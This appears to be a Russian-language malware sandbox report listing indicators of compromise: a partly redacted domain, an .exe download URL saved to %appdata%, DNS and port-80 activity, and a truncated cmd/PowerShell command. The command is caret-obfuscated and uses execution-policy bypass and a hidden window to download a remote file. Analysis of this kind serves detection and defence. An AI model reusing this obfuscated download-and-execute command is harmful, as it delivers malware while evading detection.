Техническая информация
- http://3w###urance.com/files/company/xgjvj87/9xcd2a.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwer^s^h^E^LL.^eXE ^-^E^XeCuTiO^NP^o^lI^CY ^BYPAss^ -NO^p^rof^ILE -WI^n^dOW^STYlE H^I^DD^En ^(Ne^w-^Obj^ECT ^S^YS^TEm.^n^ET.WEb^C^l^i^En^t).D^O^W^NLoAd^fIle('http://3w###urance...
- '3w###urance.com':80
- http://3w###urance.com/files/company/XgjVJ87/9xCD2A.exe
- DNS ASK 3w###urance.com
- '<SYSTEM32>\cmd.exe' /C "pOwer^s^h^E^LL.^eXE ^-^E^XeCuTiO^NP^o^lI^CY ^BYPAss^ -NO^p^rof^ILE -WI^n^dOW^STYlE H^I^DD^En ^(Ne^w-^Obj^ECT ^S^YS^TEm.^n^ET.WEb^C^l^i^En^t).D^O^W^NLoAd^fIle('http://3w###urance...' (со скрытым окном)